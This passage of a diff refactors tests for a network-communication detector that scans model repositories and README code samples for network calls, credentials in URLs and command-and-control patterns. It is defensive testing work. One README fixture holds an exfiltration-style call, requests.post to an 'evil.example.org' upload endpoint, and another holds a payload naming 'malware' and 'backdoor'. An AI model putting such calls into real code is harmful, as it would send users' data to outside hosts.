test_parenthesized_dotted_path_tokens_do_not_leak_as_domain_findings(self) -> None: """Parenthesized call URLs should still suppress redacted path-token domain hits.""" @@ -973,10 +987,7 @@ def test_parenthesized_dotted_path_tokens_do_not_leak_as_domain_findings(self) - findings = detector.scan( f"requests.get(https://example.com/download/{path_token}/model.bin)".encode(), "metadata.txt" ) - serialized = json.dumps(findings, sort_keys=True) - - assert "https://example.com/download//model.bin" in serialized - assert path_token not in serialized + _assert_serialized_path_token_isolation(findings, path_token) def test_markdown_link_dotted_path_tokens_do_not_leak_as_domain_findings(self) -> None: """Markdown-link parentheses should bound URL domain suppression.""" @@ -986,10 +997,7 @@ def test_markdown_link_dotted_path_tokens_do_not_leak_as_domain_findings(self) - findings = detector.scan( f"[model](https://example.com/download/{path_token}/model.bin)".encode(), "metadata.txt" ) - serialized = json.dumps(findings, sort_keys=True) - - assert "https://example.com/download//model.bin" in serialized - assert path_token not in serialized + _assert_serialized_path_token_isolation(findings, path_token) def test_domain_suppression_url_lookup_is_bounded(self) -> None: """Domain suppression should not scan unbounded whitespace-free buffers.""" @@ -1004,29 +1012,11 @@ def test_domain_suppression_url_lookup_is_bounded(self) -> None: def test_long_url_credentials_do_not_reappear_as_domain_findings(self) -> None: """Indexed URL spans should protect credentials beyond the bounded fallback window.""" - secret = "secret-value.example.com" - data = ( - b"https://example.com/" - + b"a" * (network_comm._MAX_URL_TEXT_LOOKUP_BYTES + 1) - + f"/api_key/{secret}/model.bin".encode() - ) - - findings = NetworkCommDetector().scan(data, "hook.py") - - assert secret not in json.dumps(findings, sort_keys=True) + _assert_long_url_secret_isolation("secret-value.example.com") def test_long_url_credentials_do_not_reappear_as_ip_findings(self) -> None: """Long URL paths must not let a redacted IP-shaped credential become a second finding.""" - secret = "45.33.32.156" - data = ( - b"https://example.com/" - + b"a" * (network_comm._MAX_URL_TEXT_LOOKUP_BYTES + 1) - + f"/api_key/{secret}/model.bin".encode() - ) - - findings = NetworkCommDetector().scan(data, "hook.py") - - assert secret not in json.dumps(findings, sort_keys=True) + _assert_long_url_secret_isolation("45.33.32.156") def test_encoded_path_separator_tokens_are_redacted(self) -> None: """Encoded separators should not make a token and following artifact look benign.""" @@ -1034,10 +1024,7 @@ def test_encoded_path_separator_tokens_are_redacted(self) -> None: path_token = "AbCdEfGhIjKlMnOpQrStUvWxYz012345" findings = detector.scan(f"https://example.com/download/{path_token}%2Fweights.bin".encode(), "metadata.txt") - url_finding = next(finding for finding in findings if finding["type"] == "url_detected") - - assert url_finding["url"] == "https://example.com/download/%2Fweights.bin" - assert path_token not in json.dumps(url_finding, sort_keys=True) + _assert_redacted_path_token(findings, path_token, "https://example.com/download/%2Fweights.bin") @pytest.mark.parametrize("separator", [":", "%3A"]) def test_colon_delimited_path_tokens_are_redacted(self, separator: str) -> None: @@ -1060,10 +1047,7 @@ def test_high_entropy_artifact_filename_stems_are_redacted(self) -> None: path_token = "Aa1Bb2Cc3Dd4Ee5Ff6Gg7Hh8Ii9Jj0" findings = detector.scan(f"https://example.com/download/{path_token}.bin".encode(), "metadata.txt") - url_finding = next(finding for finding in findings if finding["type"] == "url_detected") - - assert url_finding["url"] == "https://example.com/download/.bin" - assert path_token not in json.dumps(url_finding, sort_keys=True) + _assert_redacted_path_token(findings, path_token, "https://example.com/download/.bin") def test_urlsafe_artifact_filename_stems_are_redacted(self) -> None: """URL-safe base64 token stems may include hyphen and underscore before artifact suffixes.""" @@ -1071,10 +1055,7 @@ def test_urlsafe_artifact_filename_stems_are_redacted(self) -> None: path_token = "AbCdEfGhIjKlMnOpQrStUvWxYz123456-_" findings = detector.scan(f"https://example.com/download/{path_token}.bin".encode(), "metadata.txt") - url_finding = next(finding for finding in findings if finding["type"] == "url_detected") - - assert url_finding["url"] == "https://example.com/download/.bin" - assert path_token not in json.dumps(url_finding, sort_keys=True) + _assert_redacted_path_token(findings, path_token, "https://example.com/download/.bin") def test_lowercase_urlsafe_artifact_filename_stems_are_redacted(self) -> None: """Lowercase URL-safe token stems with separators should still be entropy-checked.""" @@ -1082,10 +1063,7 @@ def test_lowercase_urlsafe_artifact_filename_stems_are_redacted(self) -> None: path_token = "abcdefghjkmnpqrstvwxyz0123456789-_" findings = detector.scan(f"https://example.com/download/{path_token}.bin".encode(), "metadata.txt") - url_finding = next(finding for finding in findings if finding["type"] == "url_detected") - - assert url_finding["url"] == "https://example.com/download/.bin" - assert path_token not in json.dumps(url_finding, sort_keys=True) + _assert_redacted_path_token(findings, path_token, "https://example.com/download/.bin") @pytest.mark.parametrize( "url", @@ -1599,12 +1577,7 @@ def test_endpoint_shaped_credentials_do_not_create_findings( endpoint: str, ) -> None: """Credential assignments must not reappear through generic endpoint scanners.""" - findings = NetworkCommDetector().scan(data, "hook.py") - - assert secret not in json.dumps(findings, sort_keys=True) - assert any( - finding.get("type") == endpoint_type and finding.get(endpoint_field) == endpoint for finding in findings - ) + _assert_endpoint_credential_isolation(data, secret, endpoint_type, endpoint_field, endpoint) @pytest.mark.parametrize( ("data", "endpoint_type", "endpoint_field", "endpoint"), @@ -1670,12 +1643,7 @@ def test_bare_auth_scheme_values_do_not_create_findings( endpoint_field: str, endpoint: str, ) -> None: - findings = NetworkCommDetector().scan(data, "hook.py") - - assert secret not in json.dumps(findings, sort_keys=True) - assert any( - finding.get("type") == endpoint_type and finding.get(endpoint_field) == endpoint for finding in findings - ) + _assert_endpoint_credential_isolation(data, secret, endpoint_type, endpoint_field, endpoint) def test_repeated_domain_is_reported_only_from_noncredential_context(self) -> None: """Redaction must classify the matched span rather than another copy of its value.""" @@ -3382,9 +3350,7 @@ def test_readme_python_example_accepts_constant_annotated_url_binding(self) -> N b"requests.get(image_url, stream=True)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_without_network_calls(data) @pytest.mark.parametrize( "image_url", @@ -3425,10 +3391,7 @@ def test_readme_python_example_preserves_mixed_untrusted_requests(self) -> None: b"requests.post('https://evil.example.org/upload')\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_network_library_and_function(data, "README.md") @pytest.mark.parametrize( "mutator", @@ -3632,17 +3595,7 @@ def test_readme_python_example_rejects_unproven_safe_weights_only( self, model_flow: str, ) -> None: - data = ( - "```python\nimport requests\nfrom transformers import AutoModel\n" - "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n" - f"{model_flow}" - "requests.get(image_url, stream=True)\n```\n" - ).encode() - - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_unproven_readme_model_flow(model_flow) @pytest.mark.parametrize( "model_flow", @@ -3692,18 +3645,7 @@ def test_readme_python_example_allows_proven_safe_weights_only( self, model_flow: str, ) -> None: - data = ( - "```python\nimport requests\nfrom transformers import AutoModel\n" - "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n" - f"{model_flow}" - "requests.get(image_url, stream=True)\n```\n" - ).encode() - - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_safe_readme_model_flow(model_flow) @pytest.mark.parametrize( "generate_argument", @@ -3898,10 +3840,7 @@ def test_readme_python_example_rejects_mixed_sensitive_callable_alias( "runner()\n```\n" ).encode() - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_network_library_and_function(data, "README.md") @pytest.mark.parametrize( "alias_setup", @@ -4236,10 +4175,7 @@ def test_readme_python_example_rejects_unproven_transformers_model_call( f"{model_flow}```\n" ).encode() - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_network_library_and_function(data, "README.md") @pytest.mark.parametrize( ("alias_setup", "mapping_setup", "remote_call", "remote_key"), @@ -4351,9 +4287,7 @@ def test_readme_python_example_allows_v4_positional_use_model_defaults(self) -> b"requests.get(image_url, stream=True)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_without_network_calls(data) def test_readme_python_example_bounds_repeated_mapping_expansion(self) -> None: """Repeated safe mapping expansion must stay linear in the unique AST.""" @@ -4400,11 +4334,7 @@ def test_readme_python_example_allows_proven_safe_dict_union(self, mapping_setup "requests.get(image_url, stream=True)\n```\n" ).encode() - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_network_info(data) @pytest.mark.parametrize( "mapping_update", @@ -4525,11 +4455,7 @@ def test_readme_python_example_allows_safe_source_union_with_live_alias(self) -> b"requests.get(image_url, stream=True)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_network_info(data) @pytest.mark.parametrize( "mapping_setup", @@ -4569,11 +4495,7 @@ def test_readme_python_example_allows_proven_safe_mapping_ifexp(self, mapping_se "requests.get(image_url, stream=True)\n```\n" ).encode() - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_network_info(data) @pytest.mark.parametrize( "mapping_setup", @@ -4626,10 +4548,7 @@ def test_readme_python_example_rejects_unproven_mapping_ifexp(self, mapping_setu "requests.get(image_url, stream=True)\n```\n" ).encode() - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_network_library_and_function(data, "README.md") def test_readme_python_example_rejects_excessively_nested_mapping_ifexp(self) -> None: mapping = "{'input_ids': 1}" @@ -4696,10 +4615,7 @@ def test_readme_python_example_rejects_unproven_dict_union(self, mapping_setup: "requests.get(image_url, stream=True)\n```\n" ).encode() - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_network_library_and_function(data, "README.md") def test_readme_python_example_rejects_excessively_nested_dict_union(self) -> None: union = " | ".join("{'input_ids': 1}" for _ in range(600)) @@ -4823,15 +4739,7 @@ def test_readme_python_example_charges_dense_named_callable_history_before_expan binding_count = 76 example = _make_dense_named_callable_history_example(binding_count) node_count = sum(1 for _ in network_comm.ast.walk(network_comm.ast.parse(example))) - proof_budget = network_comm._ReadmeImageExampleProofBudget() - proof_charges: list[int] = [] - original_consume = proof_budget.consume_named_callable - - def record_proof_work(work: int) -> bool: - proof_charges.append(work) - return original_consume(work) - - monkeypatch.setattr(proof_budget, "consume_named_callable", record_proof_work) + proof_budget, proof_charges = _record_proof_budget(monkeypatch) assert node_count == 573 assert network_comm._is_valid_official_readme_sample_image_example( @@ -4935,15 +4843,7 @@ def test_readme_python_example_charges_conditional_named_callable_resolution( "requests.get(image_url, stream=True)\n" ) node_count = sum(1 for _ in network_comm.ast.walk(network_comm.ast.parse(example))) - proof_budget = network_comm._ReadmeImageExampleProofBudget() - proof_charges: list[int] = [] - original_consume = proof_budget.consume_named_callable - - def record_proof_work(work: int) -> bool: - proof_charges.append(work) - return original_consume(work) - - monkeypatch.setattr(proof_budget, "consume_named_callable", record_proof_work) + proof_budget, proof_charges = _record_proof_budget(monkeypatch) assert network_comm._is_valid_official_readme_sample_image_example( example.encode(), @@ -5093,10 +4993,7 @@ def test_readme_python_example_rejects_cyclic_generate_kwargs_mapping(self) -> N b"requests.get(image_url, stream=True)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_network_library_and_function(data, "README.md") @pytest.mark.parametrize( "remote_call", @@ -5195,9 +5092,7 @@ def test_readme_python_example_allows_documented_generate_kwargs_unpacking(self) b"requests.get(image_url, stream=True)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_without_network_calls(data) def test_readme_python_example_allows_non_mutating_generate_kwargs_read(self) -> None: """Reading a proven mapping's length does not expose it to mutation.""" @@ -5211,11 +5106,7 @@ def test_readme_python_example_allows_non_mutating_generate_kwargs_read(self) -> b"requests.get(image_url, stream=True)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_network_info(data) @pytest.mark.parametrize( "operation", @@ -5258,11 +5149,7 @@ def test_readme_python_example_allows_processor_generate_kwargs_unpacking(self) b"model.generate(**inputs)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_network_info(data) @pytest.mark.parametrize( "mapping_expression", @@ -5480,11 +5367,7 @@ def test_readme_python_example_allows_exhaustive_safe_mapping_branch_join( f"{mapping_flow}```\n" ).encode() - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_network_info(data) def test_readme_python_example_allows_module_mapping_branch_join_without_torch_import(self) -> None: data = ( @@ -5501,11 +5384,7 @@ def test_readme_python_example_allows_module_mapping_branch_join_without_torch_i b"model.generate(**inputs)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_network_info(data) @pytest.mark.parametrize( ("before_with", "inside_with", "after_with"), @@ -5744,11 +5623,7 @@ def test_readme_python_example_allows_ordered_nested_literal_mapping(self) -> No b"```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_network_info(data) @pytest.mark.parametrize( "compound_statement", @@ -6047,10 +5922,7 @@ def test_readme_python_example_rejects_inline_mapping_factory_shadowing( "```\n" ).encode() - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_network_library_and_function(data, "README.md") @pytest.mark.parametrize( "generate_statement", @@ -6076,11 +5948,7 @@ def test_readme_python_example_allows_unshadowed_inline_mapping_factory( "```\n" ).encode() - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_network_info(data) @pytest.mark.parametrize( "processor_call", @@ -6378,11 +6246,7 @@ def test_readme_python_example_allows_eager_assigned_generate_in_no_grad( "```\n" ).encode() - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_network_info(data) @pytest.mark.parametrize( "shadowing", @@ -6464,11 +6328,7 @@ def test_readme_python_example_allows_mapping_mutation_after_eager_assigned_gene "```\n" ).encode() - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_network_info(data) @pytest.mark.parametrize( "generate_statement", @@ -6496,10 +6356,7 @@ def test_readme_python_example_rejects_mapping_mutation_before_eager_assigned_ge "```\n" ).encode() - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_network_library_and_function(data, "README.md") @pytest.mark.parametrize( "generate_statement", @@ -6530,10 +6387,7 @@ def test_readme_python_example_rejects_non_direct_assigned_generate_in_no_grad( "```\n" ).encode() - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_network_library_and_function(data, "README.md") @pytest.mark.parametrize( "device_transfer", @@ -6580,11 +6434,7 @@ def test_readme_python_example_allows_standalone_mapping_device_transfer(self) - b"model.generate(**inputs)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_network_info(data) def test_readme_python_example_allows_renamed_mapping_device_transfer(self) -> None: """A safe transfer may bind a new mapping name before generate.""" @@ -6600,11 +6450,7 @@ def test_readme_python_example_allows_renamed_mapping_device_transfer(self) -> N b"model.generate(**device_inputs)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_network_info(data) @pytest.mark.parametrize( "mapping_flow", @@ -6661,21 +6507,7 @@ def test_readme_python_example_rejects_mutated_live_renamed_transfer_alias( self, mapping_flow: str, ) -> None: - data = ( - "```python\nimport requests\nfrom PIL import Image\n" - "from transformers import AutoModel, AutoProcessor\n" - "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n" - "image = Image.open(requests.get(image_url, stream=True).raw)\n" - "processor = AutoProcessor.from_pretrained('official/model')\n" - "model = AutoModel.from_pretrained('official/model')\n" - f"{mapping_flow}" - "model.generate(**device_inputs)\n```\n" - ).encode() - - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_live_transfer_alias_detected(mapping_flow) @pytest.mark.parametrize( "mapping_flow", @@ -6721,22 +6553,7 @@ def test_readme_python_example_allows_mutation_of_detached_renamed_transfer_alia self, mapping_flow: str, ) -> None: - data = ( - "```python\nimport requests\nfrom PIL import Image\n" - "from transformers import AutoModel, AutoProcessor\n" - "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n" - "image = Image.open(requests.get(image_url, stream=True).raw)\n" - "processor = AutoProcessor.from_pretrained('official/model')\n" - "model = AutoModel.from_pretrained('official/model')\n" - f"{mapping_flow}" - "model.generate(**device_inputs)\n```\n" - ).encode() - - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_detached_transfer_alias_allowed(mapping_flow) @pytest.mark.parametrize( "mapping_flow", @@ -6789,21 +6606,7 @@ def test_readme_python_example_rejects_mutated_live_same_name_transfer_alias( self, mapping_flow: str, ) -> None: - data = ( - "```python\nimport requests\nfrom PIL import Image\n" - "from transformers import AutoModel, AutoProcessor\n" - "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n" - "image = Image.open(requests.get(image_url, stream=True).raw)\n" - "processor = AutoProcessor.from_pretrained('official/model')\n" - "model = AutoModel.from_pretrained('official/model')\n" - f"{mapping_flow}" - "model.generate(**device_inputs)\n```\n" - ).encode() - - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_live_transfer_alias_detected(mapping_flow) @pytest.mark.parametrize( "mapping_flow", @@ -6846,22 +6649,7 @@ def test_readme_python_example_allows_detached_same_name_transfer_alias( self, mapping_flow: str, ) -> None: - data = ( - "```python\nimport requests\nfrom PIL import Image\n" - "from transformers import AutoModel, AutoProcessor\n" - "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n" - "image = Image.open(requests.get(image_url, stream=True).raw)\n" - "processor = AutoProcessor.from_pretrained('official/model')\n" - "model = AutoModel.from_pretrained('official/model')\n" - f"{mapping_flow}" - "model.generate(**device_inputs)\n```\n" - ).encode() - - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_detached_transfer_alias_allowed(mapping_flow) @pytest.mark.parametrize( "same_name_transfer", @@ -6954,21 +6742,7 @@ def test_readme_python_example_rejects_unproven_renamed_mapping_device_transfer( self, mapping_flow: str, ) -> None: - data = ( - "```python\nimport requests\nfrom PIL import Image\n" - "from transformers import AutoModel, AutoProcessor\n" - "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n" - "image = Image.open(requests.get(image_url, stream=True).raw)\n" - "processor = AutoProcessor.from_pretrained('official/model')\n" - "model = AutoModel.from_pretrained('official/model')\n" - f"{mapping_flow}" - "model.generate(**device_inputs)\n```\n" - ).encode() - - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_live_transfer_alias_detected(mapping_flow) def test_readme_python_example_allows_ordered_nested_standalone_mapping_transfer(self) -> None: """A standalone transfer may follow its binding in one supported body.""" @@ -6986,11 +6760,7 @@ def test_readme_python_example_allows_ordered_nested_standalone_mapping_transfer b"```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_network_info(data) def test_readme_python_example_allows_inline_transfer_of_proven_mapping(self) -> None: """A proven BatchEncoding may be transferred directly at generate.""" @@ -7005,11 +6775,7 @@ def test_readme_python_example_allows_inline_transfer_of_proven_mapping(self) -> b"model.generate(**inputs.to('cuda'))\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_network_info(data) @pytest.mark.parametrize( "transfer", @@ -7194,11 +6960,7 @@ def test_readme_python_example_allows_tokenizer_output_on_trusted_model_device(s b"requests.get(image_url, stream=True)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_network_info(data) @pytest.mark.parametrize( "model_setup", @@ -7365,10 +7127,7 @@ def test_readme_python_example_rejects_same_line_mapping_factory_rebind(self) -> b"model.generate(**inputs)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_network_library_and_function(data, "README.md") @pytest.mark.parametrize( ("processor_binding", "inputs_binding"), @@ -7576,18 +7335,7 @@ def test_readme_python_example_allows_ordered_disabled_remote_code_binding( self, model_flow: str, ) -> None: - data = ( - "```python\nimport requests\nfrom transformers import AutoModel\n" - "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n" - f"{model_flow}" - "requests.get(image_url, stream=True)\n```\n" - ).encode() - - findings = NetworkCommDetector().scan(data, "README.md") - - assert findings - assert all(finding["severity"] == "INFO" for finding in findings) - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_safe_readme_model_flow(model_flow) @pytest.mark.parametrize( "model_flow", @@ -7641,17 +7389,7 @@ def test_readme_python_example_rejects_unproven_disabled_remote_code_binding( self, model_flow: str, ) -> None: - data = ( - "```python\nimport requests\nfrom transformers import AutoModel\n" - "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n" - f"{model_flow}" - "requests.get(image_url, stream=True)\n```\n" - ).encode() - - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_unproven_readme_model_flow(model_flow) @pytest.mark.parametrize( "later_operation", @@ -7765,10 +7503,7 @@ def test_readme_python_example_rejects_annotated_active_alias_mutation( "requests.get(image_url, stream=True)\n```\n" ).encode() - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_network_library_and_function(data, "README.md") @pytest.mark.parametrize( "alias_rebind", @@ -7814,9 +7549,7 @@ def test_readme_python_example_allows_mutation_before_alias_binding(self) -> Non b"requests.get(image_url, stream=True)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_without_network_calls(data) @pytest.mark.parametrize( "alias_operations", @@ -7886,9 +7619,7 @@ def test_readme_python_example_allows_detached_chained_literal_mapping_alias_mut b"requests.get(image_url, stream=True)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_without_network_calls(data) def test_readme_python_example_allows_alias_mutation_after_proven_conditional_rebind(self) -> None: data = ( @@ -7904,9 +7635,7 @@ def test_readme_python_example_allows_alias_mutation_after_proven_conditional_re b"requests.get(image_url, stream=True)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_without_network_calls(data) @pytest.mark.parametrize( "expression_rebind", @@ -7963,10 +7692,7 @@ def test_readme_python_example_rejects_dead_expression_rebind_before_shared_subs b"model.generate(**options)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_network_library_and_function(data, "README.md") @pytest.mark.parametrize( "function_definition", @@ -8075,10 +7801,7 @@ def test_readme_python_example_rejects_alias_mutation_after_unproven_loop_target b"model.generate(**options)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_network_library_and_function(data, "README.md") @pytest.mark.parametrize( "definition", @@ -8331,9 +8054,7 @@ def test_readme_python_example_allows_explicitly_disabled_remote_code_trust(self b"requests.get(image_url, stream=True)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + _assert_readme_without_network_calls(data) @pytest.mark.parametrize( "additional_fence", @@ -8377,10 +8098,7 @@ def test_official_sample_image_does_not_suppress_executable_python(self) -> None b"requests.get(image_url, stream=True)\n" ) - findings = NetworkCommDetector().scan(data, "example.py") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_network_library_and_function(data, "example.py") def test_readme_official_sample_image_requires_requests_import_before_call(self) -> None: data = ( @@ -8390,10 +8108,7 @@ def test_readme_official_sample_image_requires_requests_import_before_call(self) b"import requests\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_network_library_and_function(data, "README.md") def test_large_readme_keeps_bounded_official_sample_image_example(self) -> None: data = ( @@ -8411,14 +8126,7 @@ def test_readme_official_image_example_is_validated_once_per_fence( self, monkeypatch: pytest.MonkeyPatch, ) -> None: - validated_examples: list[bytes] = [] - original_validator = network_comm._is_valid_official_readme_sample_image_example - - def count_validation(example: bytes, **kwargs: Any) -> bool: - validated_examples.append(example) - return original_validator(example, **kwargs) - - monkeypatch.setattr(network_comm, "_is_valid_official_readme_sample_image_example", count_validation) + validated_examples = _record_image_validation(monkeypatch) data = ( b"```python\nimport requests\n" b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n" @@ -8481,10 +8189,7 @@ def test_readme_official_image_in_different_fence_does_not_suppress_network_call b"```python\nimport requests\nrequests.get(image_url, stream=True)\n```\n" ) - findings = NetworkCommDetector().scan(data, "README.md") - - assert any(finding["type"] == "network_library" for finding in findings) - assert any(finding["type"] == "network_function" for finding in findings) + _assert_network_library_and_function(data, "README.md") def test_readme_official_image_does_not_suppress_requests_in_another_fence(self) -> None: data = ( @@ -8502,14 +8207,7 @@ def test_readme_official_image_fence_index_stays_bounded( self, monkeypatch: pytest.MonkeyPatch, ) -> None: - validated_examples: list[bytes] = [] - original_validator = network_comm._is_valid_official_readme_sample_image_example - - def count_validation(example: bytes, **kwargs: Any) -> bool: - validated_examples.append(example) - return original_validator(example, **kwargs) - - monkeypatch.setattr(network_comm, "_is_valid_official_readme_sample_image_example", count_validation) + validated_examples = _record_image_validation(monkeypatch) example = ( b"```python\nimport requests\n" b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n" @@ -8726,15 +8424,8 @@ def test_cc_check_in_and_c2_url_assignments_stay_actionable( def test_cc_pattern_scan_reuses_lowered_payload(self) -> None: """Reuse one lowercase payload view across all C&C pattern checks.""" - class TrackingBytes(bytes): - lower_calls = 0 - - def lower(self) -> bytes: - self.lower_calls += 1 - return super().lower() - detector = NetworkCommDetector() - data = TrackingBytes(b'payload = {"malware": True, "backdoor": True}') + data = _LowerCountingBytes(b'payload = {"malware": True, "backdoor": True}') detector._scan_cc_patterns(data, "payload.bin") @@ -8895,15 +8586,8 @@ def test_blacklist_detection(self) -> None: def test_blacklist_scan_reuses_lowered_payload(self) -> None: """Reuse one lowercase payload view across configured blacklist 